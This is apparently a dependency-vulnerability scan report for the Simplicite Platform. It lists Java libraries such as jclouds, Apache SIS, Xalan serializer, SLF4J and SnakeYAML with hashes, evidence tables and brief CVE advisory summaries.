Evidence Type Source Name Value Confidence Vendor file name s3 High Vendor jar package name jclouds Highest Vendor jar package name s3 Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname s3 Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid s3 Highest Vendor pom artifactid s3 Low Vendor pom groupid org.apache.jclouds.api Highest Vendor pom name jclouds s3 api High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name s3 High Product jar package name jclouds Highest Product jar package name s3 Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds s3 api Medium Product Manifest bundle-symbolicname s3 Medium Product Manifest Implementation-Title jclouds s3 api High Product Manifest specification-title jclouds jclouds s3 api Medium Product pom artifactid s3 Highest Product pom groupid org.apache.jclouds.api Highest Product pom name jclouds s3 api High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
sentiment-analysis-parser-0.1.jarDescription:
Combines Apache OpenNLP and Apache Tika and provides facilities for automatically deriving sentiment from text. License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/edu/usc/ir/sentiment-analysis-parser/0.1/sentiment-analysis-parser-0.1.jar
MD5: 69727e01cb8165e2e5d637e527ea82d4
SHA1: 20d1524a1270c1d26e3314d2ee71a12e6a29a27d
SHA256: 035a28b4d65993b405ddcc98b4bb67cd038d4617e5c8e5c2f4d16d34c8f49e2b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sentiment-analysis-parser High Vendor jar package name apache Highest Vendor jar package name edu Highest Vendor jar package name ir Highest Vendor jar package name opennlp Highest Vendor jar package name opennlp Low Vendor jar package name parser Highest Vendor jar package name sentiment Highest Vendor jar package name sentiment Low Vendor jar package name tika Highest Vendor jar package name tools Low Vendor jar package name usc Highest Vendor pom artifactid sentiment-analysis-parser Highest Vendor pom artifactid sentiment-analysis-parser Low Vendor pom developer name Anastasija Mensikova Medium Vendor pom developer org Trinity Medium Vendor pom groupid edu.usc.ir Highest Vendor pom name SentimentAnalysisParser High Vendor pom url USCDataScience/SentimentAnalysisParser Highest Product file name sentiment-analysis-parser High Product jar package name apache Highest Product jar package name edu Highest Product jar package name ir Highest Product jar package name opennlp Highest Product jar package name parser Highest Product jar package name sentiment Highest Product jar package name sentiment Low Product jar package name tika Highest Product jar package name tools Low Product jar package name usc Highest Product pom artifactid sentiment-analysis-parser Highest Product pom developer name Anastasija Mensikova Low Product pom developer org Trinity Low Product pom groupid edu.usc.ir Highest Product pom name SentimentAnalysisParser High Product pom url USCDataScience/SentimentAnalysisParser High Version file version 0.1 High Version pom version 0.1 Highest
serializer-2.7.2.jarDescription:
Serializer to write out XML, HTML etc. as a stream of characters from an input DOM or from input
SAX events.
File Path: /var/simplicite/.m2/repository/xalan/serializer/2.7.2/serializer-2.7.2.jarMD5: e8325763fd4235f174ab7b72ed815db1SHA1: 24247f3bb052ee068971393bdb83e04512bb1c3cSHA256: e8f5b4340d3b12a0cfa44ac2db4be4e0639e479ae847df04c4ed8b521734bb4aReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name serializer High Vendor jar package name apache Highest Vendor jar package name serializer Highest Vendor jar package name xml Highest Vendor manifest: org/apache/xml/serializer/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xml/serializer/utils/ Implementation-Vendor Apache Software Foundation Medium Vendor pom artifactid serializer Highest Vendor pom artifactid serializer Low Vendor pom groupid xalan Highest Vendor pom name Xalan Java Serializer High Vendor pom parent-artifactid apache Low Vendor pom parent-groupid org.apache Medium Vendor pom url http://xml.apache.org/xalan-j/ Highest Product file name serializer High Product jar package name apache Highest Product jar package name serializer Highest Product jar package name utils Highest Product jar package name xml Highest Product manifest: org/apache/xml/serializer/ Implementation-Title org.apache.xml.serializer Medium Product manifest: org/apache/xml/serializer/ Specification-Title XSL Transformations (XSLT), at http://www.w3.org/TR/xslt Medium Product manifest: org/apache/xml/serializer/utils/ Implementation-Title org.apache.xml.serializer.utils Medium Product pom artifactid serializer Highest Product pom groupid xalan Highest Product pom name Xalan Java Serializer High Product pom parent-artifactid apache Medium Product pom parent-groupid org.apache Medium Product pom url http://xml.apache.org/xalan-j/ Medium Version file version 2.7.2 High Version manifest: org/apache/xml/serializer/ Implementation-Version 2.7.2 Medium Version manifest: org/apache/xml/serializer/utils/ Implementation-Version 2.7.2 Medium Version pom parent-version 2.7.2 Low Version pom version 2.7.2 Highest
CVE-2022-34169 suppress
The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan. CWE-681 Incorrect Conversion between Numeric Types
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
sis-feature-0.8.jarDescription:
Representations of geographic features.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/sis/core/sis-feature/0.8/sis-feature-0.8.jar
MD5: abcd6da5f22d8a177f7f86ad9de6779b
SHA1: 65ea6ab21713dee99a0d2fd7196b80dd631a7e02
SHA256: c90e420f46c407060b11f62787a088b1127d9e6adb7c79d65ff5a6a99dabd9e2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-feature High Vendor jar package name apache Highest Vendor jar package name feature Highest Vendor jar package name features Highest Vendor jar package name sis Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/core/sis-feature Low Vendor Manifest bundle-symbolicname org.apache.sis.feature Medium Vendor Manifest implementation-url http://sis.apache.org/core/sis-feature Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-feature Highest Vendor pom artifactid sis-feature Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer email travis.pinney@gmail.com Low Vendor pom developer id desruisseaux Medium Vendor pom developer id tlpinney Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer name Travis L. Pinney Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.apache.sis.core Highest Vendor pom name Apache SIS features High Vendor pom parent-artifactid core Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-feature High Product jar package name apache Highest Product jar package name feature Highest Product jar package name features Highest Product jar package name sis Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/core/sis-feature Low Product Manifest Bundle-Name Apache SIS features Medium Product Manifest bundle-symbolicname org.apache.sis.feature Medium Product Manifest Implementation-Title Apache SIS features High Product Manifest implementation-url http://sis.apache.org/core/sis-feature Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-feature Highest Product pom developer email desruisseaux@apache.org Low Product pom developer email travis.pinney@gmail.com Low Product pom developer id desruisseaux Low Product pom developer id tlpinney Low Product pom developer name Martin Desruisseaux Low Product pom developer name Travis L. Pinney Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.apache.sis.core Highest Product pom name Apache SIS features High Product pom parent-artifactid core Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
sis-metadata-0.8.jarDescription:
Implementations of metadata derived from ISO 19115. This module provides both an implementation
of the metadata interfaces defined in GeoAPI, and a framework for handling those metadata through
Java reflection.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/sis/core/sis-metadata/0.8/sis-metadata-0.8.jar
MD5: de28abdfc0d83256a87db3ceb6b094c2
SHA1: b5d309428e78ebdaf1ea04aec8747a2093689e20
SHA256: d04e98ee08441d30663d1bc45582da9672360b1a148a4faccbb55a5e1437da7c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-metadata High Vendor jar package name apache Highest Vendor jar package name iso Highest Vendor jar package name metadata Highest Vendor jar package name sis Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/core/sis-metadata Low Vendor Manifest bundle-symbolicname org.apache.sis.metadata Medium Vendor Manifest implementation-url http://sis.apache.org/core/sis-metadata Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.core Medium Vendor Manifest provide-capability osgi.serviceloader;osgi.serviceloader="org.apache.sis.internal.jaxb.TypeRegistration" Low Vendor Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-metadata Highest Vendor pom artifactid sis-metadata Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer id desruisseaux Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.apache.sis.core Highest Vendor pom name Apache SIS metadata High Vendor pom parent-artifactid core Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-metadata High Product jar package name apache Highest Product jar package name internal Highest Product jar package name iso Highest Product jar package name jaxb Highest Product jar package name metadata Highest Product jar package name sis Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/core/sis-metadata Low Product Manifest Bundle-Name Apache SIS metadata Medium Product Manifest bundle-symbolicname org.apache.sis.metadata Medium Product Manifest Implementation-Title Apache SIS metadata High Product Manifest implementation-url http://sis.apache.org/core/sis-metadata Low Product Manifest provide-capability osgi.serviceloader;osgi.serviceloader="org.apache.sis.internal.jaxb.TypeRegistration" Low Product Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-metadata Highest Product pom developer email desruisseaux@apache.org Low Product pom developer id desruisseaux Low Product pom developer name Martin Desruisseaux Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.apache.sis.core Highest Product pom name Apache SIS metadata High Product pom parent-artifactid core Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
sis-netcdf-0.8.jarDescription:
Bridge between netCDF Climate and Forecast (CF) convention and ISO 19115 metadata.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/sis/storage/sis-netcdf/0.8/sis-netcdf-0.8.jar
MD5: 2096511e5dac7016da8eacd3a4914e99
SHA1: 0aa44675239c11eeb598ef054efdf2673cd4953a
SHA256: a6477f4437c0a0ed623664739b6c9ada0cceba01d5163d0793eadb5b23677511
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-netcdf High Vendor jar package name apache Highest Vendor jar package name netcdf Highest Vendor jar package name sis Highest Vendor jar package name storage Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/storage/sis-netcdf Low Vendor Manifest bundle-symbolicname org.apache.sis.storage.netcdf Medium Vendor Manifest implementation-url http://sis.apache.org/storage/sis-netcdf Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.storage Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-netcdf Highest Vendor pom artifactid sis-netcdf Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer email johann.sorel@geomatys.com Low Vendor pom developer id desruisseaux Medium Vendor pom developer id jsorel Medium Vendor pom developer name Johann Sorel Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.apache.sis.storage Highest Vendor pom name Apache SIS netCDF storage High Vendor pom parent-artifactid storage Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-netcdf High Product jar package name apache Highest Product jar package name netcdf Highest Product jar package name sis Highest Product jar package name storage Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/storage/sis-netcdf Low Product Manifest Bundle-Name Apache SIS netCDF storage Medium Product Manifest bundle-symbolicname org.apache.sis.storage.netcdf Medium Product Manifest Implementation-Title Apache SIS netCDF storage High Product Manifest implementation-url http://sis.apache.org/storage/sis-netcdf Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-netcdf Highest Product pom developer email desruisseaux@apache.org Low Product pom developer email johann.sorel@geomatys.com Low Product pom developer id desruisseaux Low Product pom developer id jsorel Low Product pom developer name Johann Sorel Low Product pom developer name Martin Desruisseaux Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.apache.sis.storage Highest Product pom name Apache SIS netCDF storage High Product pom parent-artifactid storage Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
sis-referencing-0.8.jarDescription:
Implementations of Coordinate Reference Systems (CRS),
conversion and transformation services derived from ISO 19111.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/sis/core/sis-referencing/0.8/sis-referencing-0.8.jar
MD5: c0bbeebdff505844f3d7181a127abcbb
SHA1: 8c9eb6766665eea110f47c53787b7a9bc1310400
SHA256: f194d08bdda2509e104ea32004384298014ecd664aa7d7c30dacf0ee41bfa2f9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-referencing High Vendor jar package name apache Highest Vendor jar package name crs Highest Vendor jar package name referencing Highest Vendor jar package name sis Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/core/sis-referencing Low Vendor Manifest bundle-symbolicname org.apache.sis.referencing Medium Vendor Manifest implementation-url http://sis.apache.org/core/sis-referencing Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.core Medium Vendor Manifest provide-capability osgi.serviceloader;osgi.serviceloader="org.apache.sis.internal.jaxb.AdapterReplacement",org.opengis.referencing.operation.MathTransformFactory,org.opengis.referencing.operation.OperationMethod,org.opengis.temporal.TemporalFactory Low Vendor Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-referencing Highest Vendor pom artifactid sis-referencing Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer email mattmann@apache.org Low Vendor pom developer email remi.marechal@geomatys.com Low Vendor pom developer id desruisseaux Medium Vendor pom developer id mattmann Medium Vendor pom developer id rmarechal Medium Vendor pom developer name Chris A. Mattmann Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer name Rémi Maréchal Medium Vendor pom developer org Geomatys Medium Vendor pom developer org NASA Jet Propulsion Laboratory Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom developer org URL http://www.jpl.nasa.gov Medium Vendor pom groupid org.apache.sis.core Highest Vendor pom name Apache SIS referencing High Vendor pom parent-artifactid core Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-referencing High Product jar package name apache Highest Product jar package name crs Highest Product jar package name internal Highest Product jar package name jaxb Highest Product jar package name operation Highest Product jar package name referencing Highest Product jar package name sis Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/core/sis-referencing Low Product Manifest Bundle-Name Apache SIS referencing Medium Product Manifest bundle-symbolicname org.apache.sis.referencing Medium Product Manifest Implementation-Title Apache SIS referencing High Product Manifest implementation-url http://sis.apache.org/core/sis-referencing Low Product Manifest provide-capability osgi.serviceloader;osgi.serviceloader="org.apache.sis.internal.jaxb.AdapterReplacement",org.opengis.referencing.operation.MathTransformFactory,org.opengis.referencing.operation.OperationMethod,org.opengis.temporal.TemporalFactory Low Product Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-referencing Highest Product pom developer email desruisseaux@apache.org Low Product pom developer email mattmann@apache.org Low Product pom developer email remi.marechal@geomatys.com Low Product pom developer id desruisseaux Low Product pom developer id mattmann Low Product pom developer id rmarechal Low Product pom developer name Chris A. Mattmann Low Product pom developer name Martin Desruisseaux Low Product pom developer name Rémi Maréchal Low Product pom developer org Geomatys Low Product pom developer org NASA Jet Propulsion Laboratory Low Product pom developer org URL http://www.geomatys.com Low Product pom developer org URL http://www.jpl.nasa.gov Low Product pom groupid org.apache.sis.core Highest Product pom name Apache SIS referencing High Product pom parent-artifactid core Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
CVE-2023-3485 suppress
Insecure defaults in open-source Temporal Server before version 1.20 on all platforms allows an attacker to craft a task token with access to a namespace other than the one specified in the request. Creation of this task token must be done outside of the normal Temporal server flow. It requires the namespace UUID and information from the workflow history for the target namespace. Under these conditions, it is possible to interfere with pending tasks in other namespaces, such as marking a task failed or completed.
If a task is targeted for completion by the attacker, the targeted namespace must also be using the same data converter configuration as the initial, valid, namespace for the task completion payload to be decoded by workers in the target namespace.
CWE-1188
CVSSv3:
Base Score: LOW (3.6) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L References:
Vulnerable Software & Versions:
sis-storage-0.8.jarDescription:
Provides the interfaces and base classes to be implemented by various storage formats.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/sis/storage/sis-storage/0.8/sis-storage-0.8.jar
MD5: 5f3238f3d977f9299174e18c45cfaba2
SHA1: 53b323f55881b4cd6fe1ecf9464a7066a3ae2eb6
SHA256: 7cade99264a96233e11f1fd888c23f647d94673cab0275a3d81d0d990bd204e5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-storage High Vendor jar package name apache Highest Vendor jar package name sis Highest Vendor jar package name storage Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/storage/sis-storage Low Vendor Manifest bundle-symbolicname org.apache.sis.storage Medium Vendor Manifest implementation-url http://sis.apache.org/storage/sis-storage Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.storage Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-storage Highest Vendor pom artifactid sis-storage Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer email johann.sorel@geomatys.com Low Vendor pom developer email mattmann@apache.org Low Vendor pom developer email remi.marechal@geomatys.com Low Vendor pom developer id desruisseaux Medium Vendor pom developer id jsorel Medium Vendor pom developer id mattmann Medium Vendor pom developer id rmarechal Medium Vendor pom developer name Chris A. Mattmann Medium Vendor pom developer name Johann Sorel Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer name Rémi Maréchal Medium Vendor pom developer org Geomatys Medium Vendor pom developer org NASA Jet Propulsion Laboratory Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom developer org URL http://www.jpl.nasa.gov Medium Vendor pom groupid org.apache.sis.storage Highest Vendor pom name Apache SIS common storage High Vendor pom parent-artifactid storage Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-storage High Product jar package name apache Highest Product jar package name sis Highest Product jar package name storage Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/storage/sis-storage Low Product Manifest Bundle-Name Apache SIS common storage Medium Product Manifest bundle-symbolicname org.apache.sis.storage Medium Product Manifest Implementation-Title Apache SIS common storage High Product Manifest implementation-url http://sis.apache.org/storage/sis-storage Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-storage Highest Product pom developer email desruisseaux@apache.org Low Product pom developer email johann.sorel@geomatys.com Low Product pom developer email mattmann@apache.org Low Product pom developer email remi.marechal@geomatys.com Low Product pom developer id desruisseaux Low Product pom developer id jsorel Low Product pom developer id mattmann Low Product pom developer id rmarechal Low Product pom developer name Chris A. Mattmann Low Product pom developer name Johann Sorel Low Product pom developer name Martin Desruisseaux Low Product pom developer name Rémi Maréchal Low Product pom developer org Geomatys Low Product pom developer org NASA Jet Propulsion Laboratory Low Product pom developer org URL http://www.geomatys.com Low Product pom developer org URL http://www.jpl.nasa.gov Low Product pom groupid org.apache.sis.storage Highest Product pom name Apache SIS common storage High Product pom parent-artifactid storage Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
sis-utility-0.8.jarDescription:
Miscellaneous utilities.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/sis/core/sis-utility/0.8/sis-utility-0.8.jar
MD5: 10e3a9e45b8256c21eb143e7f6060474
SHA1: 4ad2d0805780c5a2cebc0dadbfb8307f94c91c4f
SHA256: add922cad9d64c14ff2098c8c599dcdad8f8593978ee94a68e2278aa0b0dff41
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-utility High Vendor jar package name apache Highest Vendor jar package name sis Highest Vendor jar package name util Highest Vendor jar package name utilities Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/core/sis-utility Low Vendor Manifest bundle-symbolicname org.apache.sis.util Medium Vendor Manifest implementation-url http://sis.apache.org/core/sis-utility Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.core Medium Vendor Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.serviceloader;cardinality:=multiple,osgi.extender;filter:="(osgi.extender=osgi.serviceloader.processor)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor Manifest spi-producer * Low Vendor pom artifactid sis-utility Highest Vendor pom artifactid sis-utility Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer id desruisseaux Medium Vendor pom developer id jwhite Medium Vendor pom developer name Joseph F. White Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.apache.sis.core Highest Vendor pom name Apache SIS utilities High Vendor pom parent-artifactid core Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-utility High Product jar package name apache Highest Product jar package name geoapi Highest Product jar package name sis Highest Product jar package name util Highest Product jar package name utilities Highest Product jar package name version Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/core/sis-utility Low Product Manifest Bundle-Name Apache SIS utilities Medium Product Manifest bundle-symbolicname org.apache.sis.util Medium Product Manifest Implementation-Title Apache SIS utilities High Product Manifest implementation-url http://sis.apache.org/core/sis-utility Low Product Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.serviceloader;cardinality:=multiple,osgi.extender;filter:="(osgi.extender=osgi.serviceloader.processor)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product Manifest spi-producer * Low Product pom artifactid sis-utility Highest Product pom developer email desruisseaux@apache.org Low Product pom developer id desruisseaux Low Product pom developer id jwhite Low Product pom developer name Joseph F. White Low Product pom developer name Martin Desruisseaux Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.apache.sis.core Highest Product pom name Apache SIS utilities High Product pom parent-artifactid core Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
slf4j-api-1.7.30.jarDescription:
The slf4j API File Path: /var/simplicite/.m2/repository/org/slf4j/slf4j-api/1.7.30/slf4j-api-1.7.30.jarMD5: f8be00da99bc4ab64c79ab1e2be7cb7cSHA1: b5a4b6d16ab13e34a88fae84c35cd5d68cac922cSHA256: cdba07964d1bb40a0761485c6b1e8c2f8fd9eb1d19c53928ac0d7f9510105c57Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name slf4j-api High Vendor jar package name slf4j Highest Vendor Manifest automatic-module-name org.slf4j Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname slf4j.api Medium Vendor pom artifactid slf4j-api Highest Vendor pom artifactid slf4j-api Low Vendor pom groupid org.slf4j Highest Vendor pom name SLF4J API Module High Vendor pom parent-artifactid slf4j-parent Low Vendor pom url http://www.slf4j.org Highest Product file name slf4j-api High Product jar package name slf4j Highest Product Manifest automatic-module-name org.slf4j Medium Product Manifest Bundle-Name slf4j-api Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname slf4j.api Medium Product Manifest Implementation-Title slf4j-api High Product pom artifactid slf4j-api Highest Product pom groupid org.slf4j Highest Product pom name SLF4J API Module High Product pom parent-artifactid slf4j-parent Medium Product pom url http://www.slf4j.org Medium Version file version 1.7.30 High Version Manifest Bundle-Version 1.7.30 High Version Manifest Implementation-Version 1.7.30 High Version pom version 1.7.30 Highest
slf4j-log4j12-1.7.30.jarDescription:
SLF4J LOG4J-12 Binding File Path: /var/simplicite/.m2/repository/org/slf4j/slf4j-log4j12/1.7.30/slf4j-log4j12-1.7.30.jarMD5: 78f1ff83b38c52a30a278dec6e023a6dSHA1: c21f55139d8141d2231214fb1feaf50a1edca95eSHA256: 4d41e01c40caf8a6c74add2b073055d8a4ce1c30e58154177b13f12d78abbe7bReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name slf4j-log4j12 High Vendor jar package name log4j Highest Vendor jar package name slf4j Highest Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname slf4j.log4j12 Medium Vendor pom artifactid slf4j-log4j12 Highest Vendor pom artifactid slf4j-log4j12 Low Vendor pom groupid org.slf4j Highest Vendor pom name SLF4J LOG4J-12 Binding High Vendor pom parent-artifactid slf4j-parent Low Vendor pom url http://www.slf4j.org Highest Product file name slf4j-log4j12 High Product jar package name log4j Highest Product jar package name slf4j Highest Product Manifest Bundle-Name slf4j-log4j12 Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname slf4j.log4j12 Medium Product Manifest Implementation-Title slf4j-log4j12 High Product pom artifactid slf4j-log4j12 Highest Product pom groupid org.slf4j Highest Product pom name SLF4J LOG4J-12 Binding High Product pom parent-artifactid slf4j-parent Medium Product pom url http://www.slf4j.org Medium Version file version 1.7.30 High Version Manifest Bundle-Version 1.7.30 High Version Manifest Implementation-Version 1.7.30 High Version pom version 1.7.30 Highest
snakeyaml-1.25.jarDescription:
YAML 1.1 parser and emitter for Java License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/yaml/snakeyaml/1.25/snakeyaml-1.25.jar
MD5: 6f7d5b8f596047aae07a3bf6f23a0bf2
SHA1: 8b6e01ef661d8378ae6dd7b511a7f2a33fae1421
SHA256: b50ef33187e7dc922b26dbe4dd0fdb3a9cf349e75a08b95269901548eee546eb
Referenced In Project/Scope: Simplicite Platform:compile
